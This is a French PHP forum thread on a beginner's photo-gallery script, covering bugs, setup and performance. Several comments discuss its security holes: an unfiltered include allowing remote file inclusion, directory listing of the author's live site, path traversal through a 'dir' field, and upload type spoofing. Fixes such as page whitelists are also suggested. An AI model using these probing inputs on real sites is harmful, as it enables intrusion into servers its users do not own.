stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007
-
29 avril 2005 à 20:59
cs_diap
Messages postés6Date d'inscriptionlundi 7 novembre 2005StatutMembreDernière intervention21 juin 2006
-
25 janv. 2006 à 21:27
Cette discussion concerne un article du site. Pour la consulter dans son contexte d'origine, cliquez sur le lien ci-dessous.
cs_diap
Messages postés6Date d'inscriptionlundi 7 novembre 2005StatutMembreDernière intervention21 juin 2006 25 janv. 2006 à 21:27
Bonjour Cdrik & vous tous,
Cette source est top et ce qui est génial c'est que l'on peut voir les améliorations apportées par cette communauté d'internautes.
Etais-tu au courant qu'il y avait un bug lié aux caractères es noms de fichiers images importées ?
Ok, les espaces sont gérés " " devient %20 ce qui est très bien, mais cela ne marche pas pour un "é", un "è" ... toutes les lettres accentuées...
Il y-a t'il qqun de compétent pour me dire pourquoi le code corrigé suivant ne marche pas ?
...
$dir=strtr($dir, "èéëàäâ", "eeeaaa");
...
Ce n'est pas la même fonction que pour l'espace (et il faudra cumuler ces 2 vérifs, j'en suis conscient) et malheureusement cela ne fonctionne pas.
Autre chose : Firefox semble + intéllo que IE car lui modifie en temps réel je ne sais pas comment dire, les nom de fichiers stockés avec des lettre accentuées (Blé.jpg ->Bl%E9.jpg) !! Malheureusement Firefox n'en est qu'à 15% des utilisateurs du net...
La solution serait de faire fonctionner la fonction ci-dessus et anticiper les erreurs possibles : une aide ?
Merci Cdrik ainsi que tous les autres
Guillaume
(kergui@club-internet.fr)
coucou747
Messages postés12303Date d'inscriptionmardi 10 février 2004StatutMembreDernière intervention30 juillet 201244 13 nov. 2005 à 17:24
c'est claire, pour plus de détails, j'ai fait un tuto sur la sécuritée, mais la, tu fais un truc du genre :
cs_touffator
Messages postés2Date d'inscriptionvendredi 8 avril 2005StatutMembreDernière intervention13 novembre 2005 13 nov. 2005 à 17:14
Salut tout le monde j'etait en train de tester cette gallerie qui me convine super bien (hormis le mysql que j'ai rajouté) et j'ai remarquer les includes de ouf dans le code
include ($page);
ATTENTION c'est PAS SECURE DU TOUT !!!!!
Je suis pas du tout un pro en securité php mais la ca m'a choqué (aucun filtre arg!! )
Juste pour que vous repreniez le code, sur le photo.php j'ai rajouté ca
<?php
error_reporting(E_ALL);
include("./galerie/inc/config.php");
if (isset( $_GET['page']) or $_GET['page']='') {
$act = $_GET['page'];
//Just an extra security measure
$allowed_acts = array('galerie/new.php', 'galerie/update.php', 'galerie/index.php', 'galerie', '', 'galerie/install_index.php', 'galerie/install_new.php', 'Rajouter tout les fichiers');
if (!in_array($act, $allowed_acts))
{
die("Invalid Action!");
}
$page=$path.$_GET['page'];
}
....................
Ca passe un tout petit peut mieux et ca me rassure
++
TouF
JielJacq
Messages postés7Date d'inscriptionmardi 28 janvier 2003StatutMembreDernière intervention 2 août 2005 29 juil. 2005 à 07:14
bien, bien, mais j'ai une erreur à chaque ajout d'un commentaire (même sicelui-ci est bien enregistré ... grrr
cs_mike501
Messages postés88Date d'inscriptiondimanche 1 mai 2005StatutMembreDernière intervention 3 septembre 2007 12 juil. 2005 à 16:17
que faut il mettre comme code (condition) a la place
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 12 juil. 2005 à 10:39
ce sont les lignes qui affichent toutes les miniatures. Faut donc mettre ta condition la.
Ensuite, met un lien vers le nombre de page sous retour aux categories.
cs_mike501
Messages postés88Date d'inscriptiondimanche 1 mai 2005StatutMembreDernière intervention 3 septembre 2007 11 juil. 2005 à 16:50
j aimerai savoir quel parti du code faut changer pour pouvoir limiter le nombre de photo par page
cs_Anthomicro
Messages postés9433Date d'inscriptionmardi 9 octobre 2001StatutMembreDernière intervention13 avril 20078 4 juin 2005 à 13:36
"Justement, je sais que les photo.php?page=*** , niveau sécurité, c'est pas top..."
Ah bon ? quand c'est codé correctement y'a pas de risques, tu fais une gestion avec un switch par exemple et c'est imparable, bref tout dépend comment c'est codé encore une fois.
a ++
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 4 juin 2005 à 12:38
merci beaucoup pour les encouragements!
Justement, y a possibilité de ne pas inclure la page dans le template, mais sur chaque page, inclure le debut et la fin du template... comme ca, les problemes de securité sont inexistants! ( sauf que j'ai pas encore eu le temps de modifier le template dans la source, mais l'utilisateur peut le faire lui meme, en attendant )
Justement, je sais que les photo.php?page=*** , niveau sécurité, c'est pas top...
brunophpcs
Messages postés4Date d'inscriptionvendredi 17 novembre 2000StatutMembreDernière intervention 4 juin 2005 4 juin 2005 à 07:21
Encore une fois, excellent scripts.
Seul gros problème: les includes référant à des liens "http://...".
Sur certains hébergeurs (comme online.net par exemple), ces appels sont interdits pour cause de sécurité probablement.
Il faut donc faire appel à des fichiers sur le serveur (include ./monfichier) ce qui n'est pas de tout compatible avec la forme de tes scripts (puisque tu utilises les mêmes variables pour les include que pour les liens html).
C'est donc un gros point (de sécurité) à modifier. Remarque que ça aidera aussi beaucoup à la lisibilité...
Bruno
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 3 juin 2005 à 21:22
des fois, c'est l'include qui a des problemes... alors pour corriger ca ( ce que je ferais dans la prochaine édition, la j'ai pas vraiment le temps... ) il faut que tu crée ton template en 2 fichiers distincts, l'un comprenant le code html avant le texte, et l'autre la fin, et mettre a jour le config.php
Comme ca, ca devrait marcher!
efreeze
Messages postés1Date d'inscriptionmercredi 1 juin 2005StatutMembreDernière intervention 3 juin 2005 3 juin 2005 à 18:48
Salut
Pour moi ca ne marche pas a cause du .htaccess. Si on utilise une authetification par l'intermediaire d'apache on obtien ceci :
Warning: main(************/galerie): failed to open stream: HTTP request failed! HTTP/1.1 401 Authorization Required in /var/www/photo.php on line 27
Warning: main(): Failed opening '****************/galerie' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/photo.php on line 27
SI quelqun a une idée merci.
seb
zyxel12
Messages postés13Date d'inscriptionmercredi 19 mai 2004StatutMembreDernière intervention 7 juin 2005 31 mai 2005 à 20:49
C'est parti.
Merci!
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 31 mai 2005 à 19:00
ben... c'est vrai qu'il y a des examens... mais un mail direct est autorisé ;-)... cdrik at ts1-jda dot fr dot st
mais no problemo... de toute facon, les commentaires me feront avancer!!!!!
zyxel12
Messages postés13Date d'inscriptionmercredi 19 mai 2004StatutMembreDernière intervention 7 juin 2005 31 mai 2005 à 18:21
Bonjour,
De retour! :)
Je viens de me repencher sur le problème, et je tourne en rond avec des erreurs de format d'image en cascade; en ligne 42,43,45,51,60... du new.php.
Mais tout semble lié, par exemple la divison par zéro en ligne 45 correspond à $hauteursource de la ligne 43, etc...
Plutot que d'encombrer le forum avec une tartine sans grand intéret de ce que j'ai pu noter, accepterais-tu un mail direct avec un détail précis?
Sinon pas de souci si tu n'en as pas le temps, on a tous des impératifs, le mien étant de finir un site avant la fin de la semaine, mais je crois que certains ont des examens, et c'est plus important :).
Cordialement
brunophpcs
Messages postés4Date d'inscriptionvendredi 17 novembre 2000StatutMembreDernière intervention 4 juin 2005 28 mai 2005 à 09:19
Ben ouaip.
coucou747
Messages postés12303Date d'inscriptionmardi 10 février 2004StatutMembreDernière intervention30 juillet 201244 28 mai 2005 à 08:40
sous debian ??
brunophpcs
Messages postés4Date d'inscriptionvendredi 17 novembre 2000StatutMembreDernière intervention 4 juin 2005 28 mai 2005 à 08:16
Problème réglé avec un "apt-get install php4-gd".
Merci.
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 28 mai 2005 à 06:16
Bonjour matinal...
Accceptes tu la librairie GD?
brunophpcs
Messages postés4Date d'inscriptionvendredi 17 novembre 2000StatutMembreDernière intervention 4 juin 2005 27 mai 2005 à 22:46
Bonsoir!
Je viens d'installer ces scripts sur mon serveur apache.
Malheureusement, rien ne marche: aucune photo n'est prise en compte, que ce soit quand j'en mets une dans le répertoire img/ d'une catégorie nouvellement crée ou quand je l'upload.
Je n'obtiens aucun message d'erreur.
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 21 mai 2005 à 18:07
voila, essaie peut-etre comme ca... maintenant le script marche avec gif et png...
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 21 mai 2005 à 16:20
Aïe... depuis ces modifs, moi j'avais aucun probleme a la création de miniatures...
Tu peux me donner l'url de ton site, et les noms des images qui posent probleme?
Comme ca, j'essaierais de corriger...
Ps : t'as que du jpeg dans ton dossier img, ou aussi png, gif ou autre?
zyxel12
Messages postés13Date d'inscriptionmercredi 19 mai 2004StatutMembreDernière intervention 7 juin 2005 21 mai 2005 à 15:48
Re-Bjr,
Cette version marche mieux, mais erreurs multiples à la création de chaque image, même si l'image se crée bien...
Par exemplle:
failed to open stream: HTTP request failed! en ligne 23 de new.php
Warning: imagesx(): supplied argument is not a valid Image resource en ligne 26
Warning: imagesy(): supplied argument is not a valid Image resource en ligne 27
Warning: Division by zero en ligne 29 et 35
Warning: imagecreatetruecolor(): Invalid image dimensions en ligne 44, toujours dans new.php
Dommage, par ce que ça partait bien!!!
Cordialement
zyxel12
Messages postés13Date d'inscriptionmercredi 19 mai 2004StatutMembreDernière intervention 7 juin 2005 21 mai 2005 à 14:52
Bonjour, c'est la version du zip téléchargeable ici???
Je vais essayer ça de suite :)
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 20 mai 2005 à 21:00
Dernière news du front :
Nouvelle MAJ, avec correction de certains bugs ( avec les caracteres speciaux) mais aussi ajout de nouvelles fonctions ; commentaires de photo, mail...
Bref... des nouveautés...
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 14 mai 2005 à 14:06
le copy... oups, j'avais oublié de l'enlever celui là!
et pour les messages d'erreur, j'ai corrigé... mais pas encore mis en ligne! Entre autre (je sais plus vraiment, sauf que j'avais mis un temps fou pour corriger) y avait un problemen avec les espaces... quand une photo en avait, ca buggait (mais y avait encore autre chose... je sais plus quoi!).
Normalement, dans la prochaine version, les bugs devraient être corrigés (mais en ai-je généré de nouveaux?)... elle arrive, encore qq modifs a faire et c'est bon (ps : dsl pour le temps mis a la mise a jour, mais y a un bac et des bacs blancs a preparer... je peux pas passer tout mon temps en php, malheureusement... lol)
Voilou, merci beaucoup pour ces commentaires!
zyxel12
Messages postés13Date d'inscriptionmercredi 19 mai 2004StatutMembreDernière intervention 7 juin 2005 14 mai 2005 à 13:29
Bonjour,
Pour info, je me suis apperçu que la version que j'avais n'était pas celle mise à jour, du 5 mai je crois.
Avec la nouvelle version, tout semble marcher, mis à part que chaque téléchargement de nouvelle photo se traduit par une rafale de messages d'erreurs concernant le fichier new.php; alors que la photo se trouve bien chargée par la suite.
Mais génant ce tableau d'erreurs: un utilisateur non averti abandonne...
Et autre chose: pour faire fonctionner cette version, j'ai du supprimer la ligne 7 de index.php, copy "../inc/config.php","./inc/config.php");
Est-ce normal docteur? :)
Dommage, ces erreurs à la création des nouvelles photos, le reste semblait tourner...
Cordialement
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 12 mai 2005 à 18:51
si tu utilise la galerie sur ton site, préviens moi ! je te ferais un peu de pub sur ma rubrique de lien ;-)
zyxel12
Messages postés13Date d'inscriptionmercredi 19 mai 2004StatutMembreDernière intervention 7 juin 2005 12 mai 2005 à 18:46
Re-bonjour, je crois que mon message précédent a été perdu par le serveur...
Mais donc grand merci à tous pour ces infos, ça va me donner motif à chercher pour comprendre, c'est sympa.
Encore merci!!
zyxel12
Messages postés13Date d'inscriptionmercredi 19 mai 2004StatutMembreDernière intervention 7 juin 2005 12 mai 2005 à 18:45
Re-bonjour, je crois que mon message précédent a été perdu par le serveur...
Mais donc grand merci à tous pour ces infos, ça va me donner motif à chercher pour comprendre, c'est sympa.
Encore merci!!
zyxel12
Messages postés13Date d'inscriptionmercredi 19 mai 2004StatutMembreDernière intervention 7 juin 2005 12 mai 2005 à 18:43
Bonjour et merci,
Voilà qui va me faire chercher un peu, c'est le seul moyen de comprendre :-) Je vois maintenant de quel coté m'orienter, c'est sympa.
Je viendrai surveiller la suite, mais là je dois mettre un petit site en ligne rapidement, alors c'est parfait.
Encore merci à tous.
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 12 mai 2005 à 17:59
oki... vu que je bosse jamais en local (erreur de ma part, je sais, mais je prefere tout de suite tester sur le serveur... je savais pas repondre!
Ps: que c'est joli, un nouveau template pour phpcs... ca fait tout drole la premiere fois! ;-)
Et zyxel12 , reviens regulierement voir les commentaires de la source, je vais bientot mettre une mise a jour ( des commentaires, meilleur compatibilité avec les espaces, peut-etre, si j'arrive : possibilité de telecharger les photos en .zip, et faut encore que je regarde qqch niveau sécurité...)
Y a deja certaines modifs qui sont visibles sur mon site, mais en test ;-)
cs_twisteurwin
Messages postés167Date d'inscriptionmardi 21 septembre 2004StatutMembreDernière intervention 2 mai 2009 12 mai 2005 à 07:16
Ben je suis aussi un débutant et je ne pense pas que ce soit une ânerie... faut activer la librairie gd dans les extensions php...( facile sous easy php )
Pour ceux qui utilise wamp comme moi faut ouvrir le fichier php.ini et dé commenter la ligne...en virant le ; devant...
vala
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 12 mai 2005 à 07:00
Le script a besoin de la librairie gd.
a mon avis, tu ne dois pas l'avoir installée, ou qqch dans le style...
Donc, non ca n'a pas l'air d'une anerie de ta part ;-)
Enfin... je pense... moi aussi je suis débutant... qu'en pensent les autres?
zyxel12
Messages postés13Date d'inscriptionmercredi 19 mai 2004StatutMembreDernière intervention 7 juin 2005 12 mai 2005 à 00:54
Bonjour,
Une question de débutant, qui va peut-être vous faire sourire, mais quelle est l'erreur, quand on obtient le message
Fatal error: Call to undefined function: imagecreatefromjpeg() in /filer/a/d/adnhlait/galerie/1/index.php on line 7
à chaque tentative d'accès à une galerie nouvellement créée???
J'imagine que c'est une simple ânerie de ma part, mais laquelle donc?
Excusez une question de débutant, et merci :)
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 2 mai 2005 à 21:08
y a encore des bugs sur ma source: avec certains navigateurs, y acceptent pas les galerie//index.php ou autre triples slash (c'est vrai que c'est pas joli joli!)
La correction est faîte, je mets en ligne...
coucou747
Messages postés12303Date d'inscriptionmardi 10 février 2004StatutMembreDernière intervention30 juillet 201244 2 mai 2005 à 18:44
avec telent, on fait les entêtes et tt ça...
sibi12
Messages postés337Date d'inscriptionjeudi 19 décembre 2002StatutMembreDernière intervention15 avril 2006 2 mai 2005 à 17:31
"Par contre, j'arrive pas à accéder à ton site... ca me redirige sur un autre (quais des brumes, avec pleins de caractères spéciaux... ca sur firefox, et sur ie, ca met serveur introuvable...)."
il disait qu'il a essayer en local j'imagine donc que re5271 est le nom de l'ordinateur et que c'est donc normal que tu ne sache pas te connecter dessus.
IE va simplement rechercher le serveur et mettre serveur introuvable si il n'en trouve pas.
malalam
Messages postés10839Date d'inscriptionlundi 24 février 2003StatutMembreDernière intervention 2 mars 201025 2 mai 2005 à 17:04
De toutes facons, la coherence et la constance sont plus importantes, a mon sens. Choisis un style, et colles-y :-)
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 2 mai 2005 à 16:55
--->galadriann: Très juste... y avait un petit bug...
Pourtant pour tous mes tests, ca marchait... comprend pas!
Je reactualise tout de suite le code!
Par contre, j'arrive pas à accéder à ton site... ca me redirige sur un autre (quais des brumes, avec pleins de caractères spéciaux... ca sur firefox, et sur ie, ca met serveur introuvable...).
Et pour les , et les points, avec echo, faut faire attention à pas se mélanger les pinceaux et mettre des , a tout bout de champs... dans une fonction, par exemple, une chaîne concaténée avec des virgules=pas beau l'avion... ;-)
sibi12
Messages postés337Date d'inscriptionjeudi 19 décembre 2002StatutMembreDernière intervention15 avril 2006 2 mai 2005 à 16:50
malalam
Messages postés10839Date d'inscriptionlundi 24 février 2003StatutMembreDernière intervention 2 mars 201025 2 mai 2005 à 16:09
Heu la c'est 5 iterations lol, j'ai essaye aussi mais le resultat est le meme (moins de difference, evidemment!! Beaucoup moins).
malalam
Messages postés10839Date d'inscriptionlundi 24 février 2003StatutMembreDernière intervention 2 mars 201025 2 mai 2005 à 16:08
Hello,
j'ai fait un bench pour en avoir le coeur net!
Bench : 1 fois echo avec virgules, une fois avec points : 5 variables concatenees, avec du texte, 500 iterations :
TEMPS avec point : 0.080598
TEMPS avec virgule : 0.07422
Idem, mais avec 2 variables :
TEMPS avec point short : 0.03445
TEMPS avec virgule short : 0.025467
cs_Anthomicro
Messages postés9433Date d'inscriptionmardi 9 octobre 2001StatutMembreDernière intervention13 avril 20078 2 mai 2005 à 14:49
Heu non les virgules sont plus rapides que les points...
galadriann
Messages postés84Date d'inscriptionmercredi 7 mai 2003StatutMembreDernière intervention12 juin 2006 2 mai 2005 à 14:01
j'ai ajouter le ".php" dans le "index.php" situe dans /galerie/ et maintenant c'est bon ...
ligne 16.
echo '
[',$path,'/',$nom_index,'/galerie/',$file,'/index.php ',$file,']',"\n";
juste pour continuer l'argumentation de vitesse... apparemment les "," sont plus lent que les "." dans les concatenations ... donc la ligne ci-dessus devrait plutot etre :
echo '
['.$path.'/'.$nom_index.'/galerie/'.$file.'/index.php '.$file.']'."\n";
Voila ... desole ... j'aurais du verifier le code avant de poster ...
a+
cs_Anthomicro
Messages postés9433Date d'inscriptionmardi 9 octobre 2001StatutMembreDernière intervention13 avril 20078 2 mai 2005 à 13:58
Coucou > lorsque tu uploades en telnet, tu spécifies un nom de champ de formulaire (ou tu modifies les entêtes http directement) ?
a + :-)
galadriann
Messages postés84Date d'inscriptionmercredi 7 mai 2003StatutMembreDernière intervention12 juin 2006 2 mai 2005 à 13:50
Salut,
petit probleme. .. j'utilise php5 sur un serveur local (test).
le site demarre bien, j'ai creer une categorie et quand j'essaie d'aller dessus j'ai:
Warning: main(http://re5271/phpcs_photogalerie/galerie/Famille/index) [function.main]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in Y:\www\phpcs_photogalerie\photo.php on line 22
Si au lieu de mettre .../index je met index.php ca passe. Et les fichiers sont bien creer en local.
Sinon j'ai ete voir sur ton site et pas mal du tout ...
merci ...
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 1 mai 2005 à 22:06
Voila, mise a jour du code...
Ca prend du temps de remplacer tous les print par des echo et les double quotes par des simples :p
Sinon, ajout de nouvelles fonctionnalités...
C'est mieux, non? (Enfin, allez, un tout petit peu, pour me faire plaisir... stp... lol!!!)
+++
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 1 mai 2005 à 19:49
oki, merci beaucoup!
cs_Kirua
Messages postés3006Date d'inscriptiondimanche 14 avril 2002StatutMembreDernière intervention31 décembre 2008 1 mai 2005 à 19:14
je pensais même que les simple quotes étaient interdits en html alors tu vois ;) et puis la rapidité du html on s'en bat les ***, c'est géré par le client, ça change rien le temps de chargement du html, ce sera tjs négligeable.
coucou747
Messages postés12303Date d'inscriptionmardi 10 février 2004StatutMembreDernière intervention30 juillet 201244 1 mai 2005 à 18:33
en html, aucune diférence, en xhtml, faut mettre des doubles...
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 1 mai 2005 à 18:31
j'ai quand même une question a propos des double et simple quotes : en html, y a t'il une différence de rapidité?
parce que ca serait plus joli une ligne :
echo '<table bgcolor="red">';
plutot que : echo '<table bgcolor=\'red\'>';
non?
cs_twisteurwin
Messages postés167Date d'inscriptionmardi 21 septembre 2004StatutMembreDernière intervention 2 mai 2009 1 mai 2005 à 12:52
Anthomicro > j'ai dis que j'plaisante pour les "ms" :-)
stroubinou > Effectivement j'ai matté le code...
coucou747
Messages postés12303Date d'inscriptionmardi 10 février 2004StatutMembreDernière intervention30 juillet 201244 1 mai 2005 à 10:32
c'est bien le type mime, mais envoyé par le navigateur, upload un truc en scannant le réseau...
pour exploiter la faille, faut uploader en telnet
cs_Anthomicro
Messages postés9433Date d'inscriptionmardi 9 octobre 2001StatutMembreDernière intervention13 avril 20078 30 avril 2005 à 21:49
"la vatriable FILE[][] est remplie par le navigateur, donc... elle n'offre aucune sécuritée suplémentaire..."
LOL, essaie pour voir de changer l'extension d'un fichier que tu uploades, et après regarde si le script te laisse passer ton .txt par exemple, on en reparle après ^^
sibi12
Messages postés337Date d'inscriptionjeudi 19 décembre 2002StatutMembreDernière intervention15 avril 2006 30 avril 2005 à 21:43
"le enigme_valid.php, tu l'as trouvé comment?"
C'est très simple j'ai vu que pour aller sur le forum la page est http://photomountain.free.fr//index.php?page=forum/forum.php. Donc je me suis dit je vais tenter http://photomountain.free.fr//index.php?page=forum/ et hop j'ai la liste des fichier. ensuite tu peux essayer les quelques fichiers. C'est dans un de ceux la que j'ai trouver l'erreur sql ca me semblait etre des fichier d'anciennes version du forum j'ai vu que tu les as bouger.
quoi que... je serait curieux de voir l'effet dans new.php si on post une variable "dir" qui est un repertoire comme ../forum/ je serait toi j'enleverrai cette variable vu que new.php est dans le repertoire voulu.
enfin ce ne sont que des failles potentielles... mais je ne les ai sans doutes pas toutes trouvées
En allant voir la source il y a sans doute moyen de trouver d'autre faille mais je n'ai pas eté la voir. (j'etais venu au depart parce que j'ai fait une soure dans le même style voila un petit temps mais j'ai toujours pas regarder la source ^^)
coucou747
Messages postés12303Date d'inscriptionmardi 10 février 2004StatutMembreDernière intervention30 juillet 201244 30 avril 2005 à 21:02
la vatriable FILE[][] est remplie par le navigateur, donc... elle n'offre aucune sécuritée suplémentaire...
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 30 avril 2005 à 18:40
là c'est bon, mais je ne me vois pas créer un tableau avec toutes les donnés possibles pour une même page
/galerie /galerie/cat1 /galerie/cat2 /galerie/cat3 /galerie/cat4
... à moins de tester si le dossier est bien galerie!
C'est pour cela que j'avais ajouté le chemin au fichier dans l'url, pour bloquer toute inclusion de fichier d'un autre site...
par contre, là où j'ai un problème, c'est pour des url du type :
photo.php?page=galerie/zinal-2005/index.php?photo_id=3
là ca va, ca marche, mais si je voulais passer une nouvelle info par galerie/zinal-2005/index.php? du genre : galerie/zinal-2005/index.php?photo_id=3&connect=true
ca bug :
photo.php?page=galerie/zinal-2005/index.php?photo_id=3&connect=true
le fichier à inclure sera toujours galerie/zinal-2005/index.php?photo_id=3 ... le connect=true étant interprété comme une variable pour photo.php!
c'est ici que je bloque avec les url...
cs_Kirua
Messages postés3006Date d'inscriptiondimanche 14 avril 2002StatutMembreDernière intervention31 décembre 2008 30 avril 2005 à 18:22
ça ne pose pas de problème, tu peux avoir la liste des fichiers autorisés à l'inclusion tout en continuant de passer des infos via l'url. c'est ce que je fais pour mes sites de 10-15 pages, et c'est très satisfaisant.
pour les infos, bah je vois pas trop où tu bloques:
index.php?page=...&info1=...&info2=...
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 30 avril 2005 à 18:19
le enigme_valid.php, tu l'as trouvé comment? c'est un lien qui te l'as donné? ou t'as aspiré mon site? parce que j'ai recopié un de mes scripts (proposer des enigmes de logique, valider les réponses...) et l'ai transformé en forum. Comme le site est encore en construction, je l'avais encore sur photomountain. Donc, si tu l'as eu par un lien, j'ai oublié de le remplacer... maintenant j'ai supprilé ce fichier inutile!!!
"le plus inquiétant serait une adresse du genre http://photomountain.free.fr/index.php?page=@javascriptfr.com pour rediriger sur leur site et executer du code php de leur cru"
Sinon, pour rediriger sur un autre site (et faire des trucs pas bien ;-) ) , j'inclus n'importe quel fichier avec le chemin de mon site, par exemple : include('http://photomountain.free.fr/n'importe quelle page demandée)... Je pensais que cela suffisait...
J'avais trouvé sur www.loadation.net la possibilité de créer un tableau avec tous les fichiers du site, mais ca me convient pas, vu que je passe des infos par les url. Qu'en pensez vous?
Et pour tester le type mime du fichier, le code est dors et deja utilisé! merci beaucoup!
Ps : sibi12 pourrais tu me dire ou tu as trouvé des erreurs sql?
merci beaucoup à tous!!!!!
cs_Anthomicro
Messages postés9433Date d'inscriptionmardi 9 octobre 2001StatutMembreDernière intervention13 avril 20078 30 avril 2005 à 17:43
Ne surtout pas vérifier l'extension mais le type mime du fichier ...
$type=$_FILES['nom_du_champ']['type'];
if($type !== 'image/pjpeg' AND $type !== 'image/jpeg')
{
//l'image n'est pas de type jpeg.
}
sibi12
Messages postés337Date d'inscriptionjeudi 19 décembre 2002StatutMembreDernière intervention15 avril 2006 30 avril 2005 à 17:33
le plus inquiétant serait une adresse du genre http://photomountain.free.fr/index.php?page=@javascriptfr.com pour rediriger sur leur site et executer du code php de leur cru. le @ ne fonctionne pas mais peut-être que d'autre caractère spéciaux bien...
cs_Kirua
Messages postés3006Date d'inscriptiondimanche 14 avril 2002StatutMembreDernière intervention31 décembre 2008 30 avril 2005 à 17:28
l'extension ça protège rien du tout, faut tester le mime type.
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 30 avril 2005 à 16:36
Petite information : erreur de codage... j'avais prévu de tester si les fichiers envoyés étaient au format jpeg... mais j'ai oublié de tester... (Oups : pb!)
Donc ca marchait pas... voici ma ligne de code,$ext etant l'extension du fichier
if ( $ext "jpg" or $ext "jpeg" or $ext = "JPEG" or $ext = "JPG") {
...
}
Sans commentaire.
Je mettrais a jour dans la soirée!
+++
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 30 avril 2005 à 13:56
le lien est simplement http://photomountain.free.fr Le rubrique photo, je l'avais mis pour dire que dans le menu, faut chercher photo et y accéder.
cs_JPR
Messages postés37Date d'inscriptionmercredi 3 juillet 2002StatutMembreDernière intervention 7 juin 2008 30 avril 2005 à 13:49
Le lien http://photomountain.free.fr rubrique photo
ne fonctionne pas ...
On peut pas voir ce que çà donne en rapidité !
JPR
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 30 avril 2005 à 13:34
"La source est correcte mais les miniatures c'est pas top il faudrait imposer une taille en px ou bien faire une condition pour les img plus haute que large afin de retrouver de belles miniatures..."
Justement, c'est deja codé comme ca. Mais je trouve que pour une raison esthétique, sur la vue d'ensemble, c'est mieux que toutes les photos aient la même taille! Je me sers des mêmes miniatures dans la vision détaillée (à droite et à gauche de la bonne photo : précédent et suivant), et là le rapport largeur/longueur est le bon.
Donc, les miniatures sont aux bonnes dimensions, je defini juste des dimensions contantes pour le plaisir des yeux sur la vue d'ensemble. Ca peut facilement être modifié (je vais ajouter une variable dans config pour qu'on puisse dire si on le veut ou non).
cs_Anthomicro
Messages postés9433Date d'inscriptionmardi 9 octobre 2001StatutMembreDernière intervention13 avril 20078 30 avril 2005 à 12:06
"Alors pour qui on gratte qq ms ?
56 K ca existe encore ?
Doit y avoir 3 dinosaures en Fr qui ont ca lol..."
Justement, c'est pour ceux qu'ont des connexions rapides qu'il faut gratter un max (et pour le serveur surtout)...
cs_Kirua
Messages postés3006Date d'inscriptiondimanche 14 avril 2002StatutMembreDernière intervention31 décembre 2008 30 avril 2005 à 11:51
23 ms, je sais pas si vous vous rendez compte qu'à l'échelle d'un ordi c'est énorme :D la plupart des épreuves d'algorithmique sont limitées à bcp moins que ça, et pour faire qq ch de vachment plus simple que de parser linéairement une chaîne de caractères ^^.
cs_twisteurwin
Messages postés167Date d'inscriptionmardi 21 septembre 2004StatutMembreDernière intervention 2 mai 2009 30 avril 2005 à 11:44
"il y a 29ms de différence..." quand jpense que certains FAI font du 20mbit/s, d'autres 8mbit/s...sans compter qu'en intranet c'est du 100mbit/s...
Alors pour qui on gratte qq ms ?
56 K ca existe encore ?
Doit y avoir 3 dinosaures en Fr qui ont ca lol...
Nan jplaisante autant bien coder tous de la même façon avec les bonnes règles dès le départ !
La source est correcte mais les miniatures c'est pas top il faudrait imposer une taille en px ou bien faire une condition pour les img plus haute que large afin de retrouver de belles miniatures...
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 30 avril 2005 à 07:05
c'est sûr! D'autant plus qu'entre echo 'valeur'.$variable et echo "valeur".$variable , il y a 29ms de différence... Mais bon... négligeable? 29ms pour 100 000 itérations? ca dépend de la longueur de la source, je pense...
cs_Anthomicro
Messages postés9433Date d'inscriptionmardi 9 octobre 2001StatutMembreDernière intervention13 avril 20078 30 avril 2005 à 01:47
Ouais bien sûr ;-)
Mais si tu veux utiliser les doubles autant concaténer ;-)
coucou747
Messages postés12303Date d'inscriptionmardi 10 février 2004StatutMembreDernière intervention30 juillet 201244 30 avril 2005 à 01:27
bah question optimisations, je suis d'accord, mais dans ce cas, autant utiliser les simples, faut être logique jusqu'au bout ! faire des choix et les assumer !
cs_Anthomicro
Messages postés9433Date d'inscriptionmardi 9 octobre 2001StatutMembreDernière intervention13 avril 20078 30 avril 2005 à 00:20
Salut,
"quand on utilises les doubles quotes, autant utiliser leurs fonctionalitées et ne pas échaper les variables..."
